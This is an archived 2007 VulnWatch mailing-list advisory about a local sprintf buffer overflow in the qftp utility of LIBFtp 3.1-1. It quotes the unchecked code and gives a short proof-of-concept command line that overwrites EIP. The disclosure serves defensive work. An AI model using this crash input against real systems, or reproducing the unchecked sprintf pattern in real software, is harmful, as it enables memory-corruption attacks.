vulnwatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer ov

from [starcadi starcadi] [Permanent Link][Original]
To: vulnwatch@vulnwatch.org
Subject: [VulnWatch] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow
From: "starcadi starcadi" <starcadi@gmail.com>
Date: Thu, 15 Mar 2007 19:28:21 +0100
Delivered-to: sp-com-lists@consult.net
Delivered-to: vulnwatch-list@securepoint.com
Delivered-to: mailing list vulnwatch@vulnwatch.org
Delivered-to: moderator for vulnwatch@vulnwatch.org
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=sqyLoqmNLrKsuGTnHznzwT+pDmQjx3z41cRhCTyvkzB4o+YlC12udJRgJvDILvWsdT7Tasko4KR9OwOq0zwuNvb4+DtBk9KuV3MOiIdtDpTctEvZjhQHf9VMgN/BAZedSpcUsIf0cBIX+nrmWWhd6yGKYJBmun/12hNC4meULC8=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=RAhwRyTJ2CuWcb1fFQ9Gax7hJrikQIWelCrX0bVwzO0ImiJDqpkiCaxVdafCqjW/ymGi1TPruzCVL6xvplkEz8pvFajH3a7naR3KHs62FMpYzeQemDMpsezV3xZufLJEx7itFOxe09ojT7CtD5jyF2TgmUn4HSzdzcZo8BszLG0=
List-help: <mailto:vulnwatch-help@vulnwatch.org>
List-post: <mailto:vulnwatch@vulnwatch.org>
List-subscribe: <mailto:vulnwatch-subscribe@vulnwatch.org>
List-unsubscribe: <mailto:vulnwatch-unsubscribe@vulnwatch.org>
Mailing-list: contact vulnwatch-help@vulnwatch.org; run by ezmlm 
http://nbpfaus.net/~pfau/ftplib/

qftp is a utility that performs file transfers using ftplib based on
instructions presented on the command line.


Description


buffer overflow in sprintf(), set_umask don't check sizelen of passed argument.


Source error


in main():
337:      case 'm' : set_umask(optarg); break;
..
void set_umask(char *m)
{
   char buf[80];
   sprintf(buf,"umask %s", m);
   ftp_connect();
   FtpSite(buf, conn);
}


POC


$ gcc ftplib.c getopt.c qftp.c -o ftpsend
$ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"`
Segmentation fault

# eip addr: $1 = (void *) 0x61616161

--
~ starcadi
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow, starcadi starcadi <=
Previous by Date:  iDefense Security Advisory 03.15.07: Horde Project Cleanup Script Arbitrary File Deletion Vulnerability, iDefense Labs
Next by Date:  [VulnWatch] LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow, starcadi starcadi
Previous by Thread:  iDefense Security Advisory 03.15.07: Horde Project Cleanup Script Arbitrary File Deletion Vulnerability, iDefense Labs
Next by Thread:  [VulnWatch] LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow, starcadi starcadi
Indexes:  [Date] [Thread] [Top] [All Lists]